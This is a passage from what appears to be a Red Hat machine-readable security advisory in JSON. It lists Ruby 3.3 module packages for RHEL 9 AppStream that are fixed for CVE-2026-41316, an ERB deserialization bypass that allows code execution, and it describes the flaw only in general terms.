"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rdoc-0:6.6.3.1-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rdoc-0:6.6.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "rubygem-rdoc-0:6.6.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rexml-0:3.4.4-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rexml-0:3.4.4-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "rubygem-rexml-0:3.4.4-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rss-0:0.3.1-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rss-0:0.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "rubygem-rss-0:0.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-test-unit-0:3.6.1-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-test-unit-0:3.6.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "rubygem-test-unit-0:3.6.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-typeprof-0:0.21.9-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-typeprof-0:0.21.9-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "rubygem-typeprof-0:0.21.9-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygems-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygems-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "rubygems-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygems-devel-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygems-devel-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "rubygems-devel-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-41316",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-04-24T03:01:16.620515+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461369"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ERB, a templating system for Ruby. An attacker who can trigger deserialization of untrusted data in a Ruby application can bypass existing protections. This vulnerability allows for arbitrary code execution by exploiting specific public methods that evaluate template source code, which were not properly guarded against deserialization attacks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "erb: ERB: Arbitrary code execution via deserialization bypass",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.src::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-default-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-doc-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bundler-0:2.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-irb-0:1.13.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-minitest-0:5.20.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.src::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-doc-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.src::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-doc-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-power_assert-0:2.0.3-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rake-0:13.1.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rdoc-0:6.6.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rexml-0:3.4.4-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
